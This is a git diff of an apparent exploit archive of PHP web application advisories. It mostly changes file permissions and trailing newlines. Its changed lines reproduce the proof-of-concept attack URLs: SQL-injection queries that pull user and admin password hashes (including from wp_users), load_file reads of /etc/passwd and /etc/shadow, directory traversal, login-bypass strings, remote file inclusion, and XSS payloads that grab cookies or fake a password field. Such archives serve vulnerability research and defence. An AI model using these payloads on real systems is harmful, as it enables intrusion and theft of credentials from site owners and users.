a/platforms/php/webapps/31734.txt +++ b/platforms/php/webapps/31734.txt @@ -31,4 +31,4 @@ Demo screenshot: https://www.dropbox.com/s/8jc51blyepypfas/pina1.png -Greets: Sayem Islam, Maruf Alam, Isti Ak Ahmed, Team BCA, Team Secupent and all Cyber Security Expert and Bug Hunters..... \ No newline at end of file +Greets: Sayem Islam, Maruf Alam, Isti Ak Ahmed, Team BCA, Team Secupent and all Cyber Security Expert and Bug Hunters..... \ No newline at end of file diff --git a/platforms/php/webapps/31735.txt b/platforms/php/webapps/31735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31739.txt b/platforms/php/webapps/31739.txt old mode 100755 new mode 100644 index d0d98b256..ea716e9a5 --- a/platforms/php/webapps/31739.txt +++ b/platforms/php/webapps/31739.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a TLM CMS 1.1 is vulnerable; other versions may also be affected. http://www.example.com/tlmcms_v1-1/tlmcms/index.php?affiche=Photo-Photo&ID=1'/**/union/**/select/**/0,1,concat(US_pwd),concat(US_pseudo),concat(US_mail)/**/from/**/pphp_user/* -http://www.example.com/tlmcms_v1-1/tlmcms/index.php?affiche=Comment&act=lire&idnews=-99999999/**/union/**/select/**/0,1,concat(US_mail),concat(US_pseudo),concat(US_pwd),5,6,7,8,9,10/**/from/**/pphp_user/* \ No newline at end of file +http://www.example.com/tlmcms_v1-1/tlmcms/index.php?affiche=Comment&act=lire&idnews=-99999999/**/union/**/select/**/0,1,concat(US_mail),concat(US_pseudo),concat(US_pwd),5,6,7,8,9,10/**/from/**/pphp_user/* \ No newline at end of file diff --git a/platforms/php/webapps/3174.txt b/platforms/php/webapps/3174.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31740.html b/platforms/php/webapps/31740.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31741.txt b/platforms/php/webapps/31741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31742.txt b/platforms/php/webapps/31742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31743.txt b/platforms/php/webapps/31743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31744.txt b/platforms/php/webapps/31744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31745.txt b/platforms/php/webapps/31745.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31746.txt b/platforms/php/webapps/31746.txt old mode 100755 new mode 100644 index e4744ab20..1bfaef4b7 --- a/platforms/php/webapps/31746.txt +++ b/platforms/php/webapps/31746.txt @@ -4,4 +4,4 @@ BatmanPorTaL is prone to multiple SQL-injection vulnerabilities because it fails A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/lab/BatmanPorTaL/profil.asp?id=1+union+select+0,admin_pw,admin_kd,3,4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1,1,1+from+ayarlar \ No newline at end of file +http://www.example.com/lab/BatmanPorTaL/profil.asp?id=1+union+select+0,admin_pw,admin_kd,3,4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1,1,1+from+ayarlar \ No newline at end of file diff --git a/platforms/php/webapps/31750.txt b/platforms/php/webapps/31750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31751.txt b/platforms/php/webapps/31751.txt old mode 100755 new mode 100644 index 1d0f5b089..3acfaa0fb --- a/platforms/php/webapps/31751.txt +++ b/platforms/php/webapps/31751.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Sphider 1.3.4 is vulnerable; other versions may also be affected. -http://www.example.com/search.php?query=xsss%20%3Cscript%3Ealert('HELLO');%3C/script%3E&search=1 \ No newline at end of file +http://www.example.com/search.php?query=xsss%20%3Cscript%3Ealert('HELLO');%3C/script%3E&search=1 \ No newline at end of file diff --git a/platforms/php/webapps/31752.txt b/platforms/php/webapps/31752.txt old mode 100755 new mode 100644 index de2204007..45ccc7608 --- a/platforms/php/webapps/31752.txt +++ b/platforms/php/webapps/31752.txt @@ -7,4 +7,4 @@ An attacker can exploit these vulnerabilities using directory-traversal strings Forum Rank System 6 is vulnerable; other versions may also be affected. http://www.example.com/infusions/rank_system/forum.php?settings[locale]=../../../../../../../../etc/passwd%00 -http://www.example.com/infusions/rank_system/profile.php?settings[locale]=../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/infusions/rank_system/profile.php?settings[locale]=../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/31753.txt b/platforms/php/webapps/31753.txt old mode 100755 new mode 100644 index 310ec211a..99c0c27fe --- a/platforms/php/webapps/31753.txt +++ b/platforms/php/webapps/31753.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Tux CMS 0.1 is vulnerable; other versions may also be affected. -http://www.example.com/?q=>"><script>alert(document.cookie)</script> http://www.example.com/tux-login.php?returnURL=>"><script>alert(document.cookie)</script> http://www.example.com/tux-login.php?returnURL=%00""><script>alert(document.cookie)</script> http://www.example.com/tux-syndication/atom.php/>"><ScRiPt>alert(document.cookie)</ScRiPt> \ No newline at end of file +http://www.example.com/?q=>"><script>alert(document.cookie)</script> http://www.example.com/tux-login.php?returnURL=>"><script>alert(document.cookie)</script> http://www.example.com/tux-login.php?returnURL=%00""><script>alert(document.cookie)</script> http://www.example.com/tux-syndication/atom.php/>"><ScRiPt>alert(document.cookie)</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/31768.txt b/platforms/php/webapps/31768.txt old mode 100755 new mode 100644 index 4a39c8953..b240f56dc --- a/platforms/php/webapps/31768.txt +++ b/platforms/php/webapps/31768.txt @@ -140,4 +140,4 @@ Timeline Discovered by: ================ -Tom Adams \ No newline at end of file +Tom Adams \ No newline at end of file diff --git a/platforms/php/webapps/31771.txt b/platforms/php/webapps/31771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31772.txt b/platforms/php/webapps/31772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31773.txt b/platforms/php/webapps/31773.txt old mode 100755 new mode 100644 index 818c197ea..713a6ef8d --- a/platforms/php/webapps/31773.txt +++ b/platforms/php/webapps/31773.txt @@ -4,4 +4,4 @@ cPanel is prone to multiple cross-site scripting vulnerabilities because the app An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/scripts2/listaccts?searchtype=domain&search=[INJECTION]&acctp=30 \ No newline at end of file +http://www.example.com/scripts2/listaccts?searchtype=domain&search=[INJECTION]&acctp=30 \ No newline at end of file diff --git a/platforms/php/webapps/31774.txt b/platforms/php/webapps/31774.txt old mode 100755 new mode 100644 index ed680dae2..fde2fa97d --- a/platforms/php/webapps/31774.txt +++ b/platforms/php/webapps/31774.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to execute arbitrary script code in the conte BlogPHP 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?act=sendmessage&user=admin[XSS] \ No newline at end of file +http://www.example.com/index.php?act=sendmessage&user=admin[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31775.txt b/platforms/php/webapps/31775.txt old mode 100755 new mode 100644 index 9e9720d57..3b14c0923 --- a/platforms/php/webapps/31775.txt +++ b/platforms/php/webapps/31775.txt @@ -4,4 +4,4 @@ OtherLogic is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/vocourse.php?id=[SQL Injection] \ No newline at end of file +http://www.example.com/vocourse.php?id=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/31776.txt b/platforms/php/webapps/31776.txt old mode 100755 new mode 100644 index 39fbc2fe9..2ab58b3d9 --- a/platforms/php/webapps/31776.txt +++ b/platforms/php/webapps/31776.txt @@ -5,4 +5,4 @@ The WordPress WP Photo Album (WPPA) plugin is prone to an SQL-injection vulnerab Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/photos/?album=1&photo=-11111+union+select+concat(user_login,char(45),user_pass)+from+wp_users-- -http://www.example.com/?page_id=[gallerypage]&album=10&photo=-16+union+select+concat(user_login,char(45),user_pass)+from+wp_users-- \ No newline at end of file +http://www.example.com/?page_id=[gallerypage]&album=10&photo=-16+union+select+concat(user_login,char(45),user_pass)+from+wp_users-- \ No newline at end of file diff --git a/platforms/php/webapps/31777.txt b/platforms/php/webapps/31777.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31778.txt b/platforms/php/webapps/31778.txt old mode 100755 new mode 100644 index 580b9eda8..85a330f33 --- a/platforms/php/webapps/31778.txt +++ b/platforms/php/webapps/31778.txt @@ -4,4 +4,4 @@ phpInstantGallery is prone to multiple cross-site scripting vulnerabilities beca An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/phpInstantGallery/index.php?gallery=[XSS] \ No newline at end of file +http://www.example.com/phpInstantGallery/index.php?gallery=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31779.txt b/platforms/php/webapps/31779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31780.txt b/platforms/php/webapps/31780.txt old mode 100755 new mode 100644 index 65e344f74..ab17cf1a8 --- a/platforms/php/webapps/31780.txt +++ b/platforms/php/webapps/31780.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow CyrixMED 1.4 is vulnerable; other versions may also be affected. -http://www.example.com/CyrixMed_v1.4/index.php?msg_erreur=[XSS] \ No newline at end of file +http://www.example.com/CyrixMed_v1.4/index.php?msg_erreur=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31781.txt b/platforms/php/webapps/31781.txt old mode 100755 new mode 100644 index a3c84758e..9101cf6f2 --- a/platforms/php/webapps/31781.txt +++ b/platforms/php/webapps/31781.txt @@ -13,4 +13,4 @@ Username: valid_username/* [eg. admin/*] Password: learn3r [or whatever] Or Username: " or 1=1/* -Password: learn3r [or whatever] \ No newline at end of file +Password: learn3r [or whatever] \ No newline at end of file diff --git a/platforms/php/webapps/31782.txt b/platforms/php/webapps/31782.txt old mode 100755 new mode 100644 index afabde16a..b79a33134 --- a/platforms/php/webapps/31782.txt +++ b/platforms/php/webapps/31782.txt @@ -7,4 +7,4 @@ Exploiting these issues may allow a remote attacker to compromise the applicatio Claroline 1.7.5 is affected; other versions may also be vulnerable. http://www.example.com/[PaTh]/claroline/inc/lib/export_exe_tracking.class.php?clarolineRepositoryAppend=[Ev!l] -http://www.example.com/[PaTh]/claroline/inc/lib/event/init_event_manager.inc.php?includePath=[Ev!l] \ No newline at end of file +http://www.example.com/[PaTh]/claroline/inc/lib/event/init_event_manager.inc.php?includePath=[Ev!l] \ No newline at end of file diff --git a/platforms/php/webapps/31783.txt b/platforms/php/webapps/31783.txt old mode 100755 new mode 100644 index 6bf7cfe31..8e4b21098 --- a/platforms/php/webapps/31783.txt +++ b/platforms/php/webapps/31783.txt @@ -6,4 +6,4 @@ Exploiting this issue can allow an attacker to compromise the application and th Fusebox 5.5.1 is vulnerable; other versions may also be affected. -http://www.example.com/[PaTh]/fusebox5.php?FUSEBOX_APPLICATION_PATH=[EV!L] \ No newline at end of file +http://www.example.com/[PaTh]/fusebox5.php?FUSEBOX_APPLICATION_PATH=[EV!L] \ No newline at end of file diff --git a/platforms/php/webapps/31784.txt b/platforms/php/webapps/31784.txt old mode 100755 new mode 100644 index 08327fcd0..71a481c62 --- a/platforms/php/webapps/31784.txt +++ b/platforms/php/webapps/31784.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th PhpMyAgenda 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/[PaTh]/infoevent.php3?rootagenda=[EV!L] \ No newline at end of file +http://www.example.com/[PaTh]/infoevent.php3?rootagenda=[EV!L] \ No newline at end of file diff --git a/platforms/php/webapps/31787.txt b/platforms/php/webapps/31787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31792.txt b/platforms/php/webapps/31792.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31793.txt b/platforms/php/webapps/31793.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31794.txt b/platforms/php/webapps/31794.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31795.txt b/platforms/php/webapps/31795.txt old mode 100755 new mode 100644 index 8db03ae46..7dfb9d681 --- a/platforms/php/webapps/31795.txt +++ b/platforms/php/webapps/31795.txt @@ -4,4 +4,4 @@ Links Pile is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/* \ No newline at end of file +http://www.example.com/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/* \ No newline at end of file diff --git a/platforms/php/webapps/31798.txt b/platforms/php/webapps/31798.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31799.txt b/platforms/php/webapps/31799.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31801.txt b/platforms/php/webapps/31801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31802.txt b/platforms/php/webapps/31802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31803.txt b/platforms/php/webapps/31803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31804.txt b/platforms/php/webapps/31804.txt old mode 100755 new mode 100644 index ba2d275a2..4b047086b --- a/platforms/php/webapps/31804.txt +++ b/platforms/php/webapps/31804.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability using directory-traversal strings to Digital Hive 2.0 RC2 is vulnerable; other versions may also be affected. -http://www.example.com/hive_v2.0_RC2/template/purpletech/base_include.php?page=../../etc/passwd \ No newline at end of file +http://www.example.com/hive_v2.0_RC2/template/purpletech/base_include.php?page=../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/31805.txt b/platforms/php/webapps/31805.txt old mode 100755 new mode 100644 index c30fc52df..65329e75b --- a/platforms/php/webapps/31805.txt +++ b/platforms/php/webapps/31805.txt @@ -4,4 +4,4 @@ The 'KuiraniKerim' module for PHP-Nuke is prone to an SQL-injection vulnerabilit Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/modules.php?name=KuraniKerim&op=TurkceNuke_Com_Islami_Moduller_Destek_Sitesi&sid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd,aid,2,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A \ No newline at end of file +http://www.example.com/modules.php?name=KuraniKerim&op=TurkceNuke_Com_Islami_Moduller_Destek_Sitesi&sid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd,aid,2,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A \ No newline at end of file diff --git a/platforms/php/webapps/31806.txt b/platforms/php/webapps/31806.txt old mode 100755 new mode 100644 index 9f2516078..44e529786 --- a/platforms/php/webapps/31806.txt +++ b/platforms/php/webapps/31806.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability using directory-traversal strings to This issue affects bcoos 1.0.13; other versions may also be affected. -http://www.example.com/bcoos/class/debug/highlight.php?file=../../../../../boot.ini \ No newline at end of file +http://www.example.com/bcoos/class/debug/highlight.php?file=../../../../../boot.ini \ No newline at end of file diff --git a/platforms/php/webapps/31807.txt b/platforms/php/webapps/31807.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31808.txt b/platforms/php/webapps/31808.txt old mode 100755 new mode 100644 index d667a011b..42dcf91a5 --- a/platforms/php/webapps/31808.txt +++ b/platforms/php/webapps/31808.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow AppServ Open Project 2.5.10 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?appservlang=">[XSS] http://www.example.com/index.php?appservlang="><IMG%20SRC=java script:alert(/XSS/)> http://www.example.com/index.php?appservlang="><BODY%20ONLOAD=alert(/ xss/)> http://www.example.com/index.php?appservlang="><script>window.open(/phpinfo.php/)</script> http://www.example.com/index.php?appservlang="><INPUT%20TYPE="xss"> http://www.example.com/index.php?appservlang="><iframe%20src=http://www.example2.com> http://www.example.com/index.php?appservlang="><BR><input%20type%20=%20"password"%20name="pass"/><button%20onClick="java script:alert(/I%20have%20your%20password:%20/%20+%20pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR> \ No newline at end of file +http://www.example.com/index.php?appservlang=">[XSS] http://www.example.com/index.php?appservlang="><IMG%20SRC=java script:alert(/XSS/)> http://www.example.com/index.php?appservlang="><BODY%20ONLOAD=alert(/ xss/)> http://www.example.com/index.php?appservlang="><script>window.open(/phpinfo.php/)</script> http://www.example.com/index.php?appservlang="><INPUT%20TYPE="xss"> http://www.example.com/index.php?appservlang="><iframe%20src=http://www.example2.com> http://www.example.com/index.php?appservlang="><BR><input%20type%20=%20"password"%20name="pass"/><button%20onClick="java script:alert(/I%20have%20your%20password:%20/%20+%20pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR> \ No newline at end of file diff --git a/platforms/php/webapps/31809.txt b/platforms/php/webapps/31809.txt old mode 100755 new mode 100644 index 69beab429..a98271f69 --- a/platforms/php/webapps/31809.txt +++ b/platforms/php/webapps/31809.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Starsgames Control Panel 4.6.2 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?showtopic=18&st=&lt;/textarea&gt;<script>alert(/xss/)</script> http://www.example.com/index.php?showtopic=18&st=&lt;/textarea&gt;<iframe src=http://www.google.com> \ No newline at end of file +http://www.example.com/index.php?showtopic=18&st=&lt;/textarea&gt;<script>alert(/xss/)</script> http://www.example.com/index.php?showtopic=18&st=&lt;/textarea&gt;<iframe src=http://www.google.com> \ No newline at end of file diff --git a/platforms/php/webapps/31810.txt b/platforms/php/webapps/31810.txt old mode 100755 new mode 100644 index 81e3b4d35..a5454e70b --- a/platforms/php/webapps/31810.txt +++ b/platforms/php/webapps/31810.txt @@ -12,4 +12,4 @@ http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+u http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,load_file(CONCAT(CHAR(0x65),CHAR(0x74),CHAR(0x63),CHAR(0x2F),CHAR(0x70),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x77),CHAR(0x64))),2,0,4+from+users/* http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(0x6574632F706173737764),50),2,0,4+from+users/* http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(etc/passwd),50),2,0,4+from+users/* -http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(etc/shadow),50),2,0,4+from+users/* \ No newline at end of file +http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(etc/shadow),50),2,0,4+from+users/* \ No newline at end of file diff --git a/platforms/php/webapps/31813.txt b/platforms/php/webapps/31813.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31821.txt b/platforms/php/webapps/31821.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31822.txt b/platforms/php/webapps/31822.txt old mode 100755 new mode 100644 index 83f981a05..4140b17b6 --- a/platforms/php/webapps/31822.txt +++ b/platforms/php/webapps/31822.txt @@ -5,4 +5,4 @@ phpFreeForum is prone to multiple cross-site scripting vulnerabilities because i An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/[phpfreeforum_path]/html/part/menu.php?nickname=<XSS> -http://www.example.com/[phpfreeforum_path]/html/part/menu.php?randomid=<XSS> \ No newline at end of file +http://www.example.com/[phpfreeforum_path]/html/part/menu.php?randomid=<XSS> \ No newline at end of file diff --git a/platforms/php/webapps/31823.txt b/platforms/php/webapps/31823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31824.txt b/platforms/php/webapps/31824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31825.txt b/platforms/php/webapps/31825.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31826.txt b/platforms/php/webapps/31826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31827.txt b/platforms/php/webapps/31827.txt old mode 100755 new mode 100644 index d6bef5505..94c624e06 --- a/platforms/php/webapps/31827.txt +++ b/platforms/php/webapps/31827.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br BMForum 5.6 is vulnerable; other versions may also be affected. http://www.example.com/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS> -http://www.example.com/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS> \ No newline at end of file +http://www.example.com/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS> \ No newline at end of file diff --git a/platforms/php/webapps/31829.txt b/platforms/php/webapps/31829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3183.txt b/platforms/php/webapps/3183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31830.txt b/platforms/php/webapps/31830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31833.txt b/platforms/php/webapps/31833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31834.txt b/platforms/php/webapps/31834.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31835.txt b/platforms/php/webapps/31835.txt old mode 100755 new mode 100644 index 8d10b8b7f..e9930cc69 --- a/platforms/php/webapps/31835.txt +++ b/platforms/php/webapps/31835.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br SAFARI Montage 3.1.3 is vulnerable; other versions may also be affected. -http://www.example.com/SAFARI/montage/forgotPW.php?school="><script>alert(1)</script> http://www.example.com/SAFARI/montage/forgotPW.php?email="><iframe src="http://www.example2.com"> \ No newline at end of file +http://www.example.com/SAFARI/montage/forgotPW.php?school="><script>alert(1)</script> http://www.example.com/SAFARI/montage/forgotPW.php?email="><iframe src="http://www.example2.com"> \ No newline at end of file diff --git a/platforms/php/webapps/31836.txt b/platforms/php/webapps/31836.txt old mode 100755 new mode 100644 index 251f51526..13c844689 --- a/platforms/php/webapps/31836.txt +++ b/platforms/php/webapps/31836.txt @@ -4,4 +4,4 @@ The Upload File plugin for WordPress is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-uploadfile.php?f_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/* \ No newline at end of file +http://www.example.com/wp-uploadfile.php?f_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31837.txt b/platforms/php/webapps/31837.txt old mode 100755 new mode 100644 index 3ce92ba4f..d9297107d --- a/platforms/php/webapps/31837.txt +++ b/platforms/php/webapps/31837.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc DZOIC Handshakes 3.5 is vulnerable; other versions may also be affected. -http://www.example.com/dzoic/index.php?handler=search&action=perform&search_type=members&fname=[Sql Injection]&lname=jakson&email=1@www.example2.com&handshakes=0&distance=0&country=0&state=0&city=0&postal_code=12345&online=on&with_photo=on&submit=Search \ No newline at end of file +http://www.example.com/dzoic/index.php?handler=search&action=perform&search_type=members&fname=[Sql Injection]&lname=jakson&email=1@www.example2.com&handshakes=0&distance=0&country=0&state=0&city=0&postal_code=12345&online=on&with_photo=on&submit=Search \ No newline at end of file diff --git a/platforms/php/webapps/31838.txt b/platforms/php/webapps/31838.txt old mode 100755 new mode 100644 index 7d9771960..4423c8799 --- a/platforms/php/webapps/31838.txt +++ b/platforms/php/webapps/31838.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Specific vulnerable versions have not been provided. We will update this BID as more information emerges. -http://www.example.com/horde/kronolith/workweek.php?timestamp=<XSS> \ No newline at end of file +http://www.example.com/horde/kronolith/workweek.php?timestamp=<XSS> \ No newline at end of file diff --git a/platforms/php/webapps/31839.txt b/platforms/php/webapps/31839.txt old mode 100755 new mode 100644 index 96b269109..5d29ed6d2 --- a/platforms/php/webapps/31839.txt +++ b/platforms/php/webapps/31839.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Specific vulnerable versions have not been provided. We will update this BID as more information emerges. -http://www.example.com/horde/kronolith/week.php?timestamp=<XSS> \ No newline at end of file +http://www.example.com/horde/kronolith/week.php?timestamp=<XSS> \ No newline at end of file diff --git a/platforms/php/webapps/3184.txt b/platforms/php/webapps/3184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31840.txt b/platforms/php/webapps/31840.txt old mode 100755 new mode 100644 index 62b53af57..9edb8cefc --- a/platforms/php/webapps/31840.txt +++ b/platforms/php/webapps/31840.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Specific vulnerable versions have not been provided. We will update this BID as more information emerges. -http://www.example.com/horde/kronolith/day.php?timestamp=<XSS> \ No newline at end of file +http://www.example.com/horde/kronolith/day.php?timestamp=<XSS> \ No newline at end of file diff --git a/platforms/php/webapps/31841.txt b/platforms/php/webapps/31841.txt old mode 100755 new mode 100644 index 00b069ad2..9614feed9 --- a/platforms/php/webapps/31841.txt +++ b/platforms/php/webapps/31841.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br miniCWB 2.1.1 is vulnerable; other versions may also be affected. http://www.example.com/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?errcontext=<XSS> -http://www.example.com/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?fckphp_config[Debug_SERVER]=<XSS> \ No newline at end of file +http://www.example.com/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?fckphp_config[Debug_SERVER]=<XSS> \ No newline at end of file diff --git a/platforms/php/webapps/31842.txt b/platforms/php/webapps/31842.txt old mode 100755 new mode 100644 index d3728028f..6043c876c --- a/platforms/php/webapps/31842.txt +++ b/platforms/php/webapps/31842.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc AbleSpace 1.0 is vulnerable; other versions may also be affected. -Http://www.example.com/ablespace/adv_cat.php?cat_id=[sql inection] \ No newline at end of file +Http://www.example.com/ablespace/adv_cat.php?cat_id=[sql inection] \ No newline at end of file diff --git a/platforms/php/webapps/31844.txt b/platforms/php/webapps/31844.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31845.txt b/platforms/php/webapps/31845.txt old mode 100755 new mode 100644 index 5ab7140e4..b5ce531a4 --- a/platforms/php/webapps/31845.txt +++ b/platforms/php/webapps/31845.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a phpFix 2.0 is vulnerable; other versions may also be affected. http://www.example.com/phpfix/auth/00_pass.php?passwd=blah&account='+or+account+like+'blah% -http://www.example.com/phpfix/auth/00_pass.php?passwd=blah&account='+or+passwd+like+'blah% \ No newline at end of file +http://www.example.com/phpfix/auth/00_pass.php?passwd=blah&account='+or+passwd+like+'blah% \ No newline at end of file diff --git a/platforms/php/webapps/31846.txt b/platforms/php/webapps/31846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31847.txt b/platforms/php/webapps/31847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31848.txt b/platforms/php/webapps/31848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31849.html b/platforms/php/webapps/31849.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3185.txt b/platforms/php/webapps/3185.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31855.txt b/platforms/php/webapps/31855.txt old mode 100755 new mode 100644 index 455bef68a..b59c8121f --- a/platforms/php/webapps/31855.txt +++ b/platforms/php/webapps/31855.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Tr Script News 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/news/news.php?mode=voir&nb=[XSS] \ No newline at end of file +http://www.example.com/news/news.php?mode=voir&nb=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31857.txt b/platforms/php/webapps/31857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31858.txt b/platforms/php/webapps/31858.txt old mode 100755 new mode 100644 index 2f043c6d9..f4060b39f --- a/platforms/php/webapps/31858.txt +++ b/platforms/php/webapps/31858.txt @@ -6,4 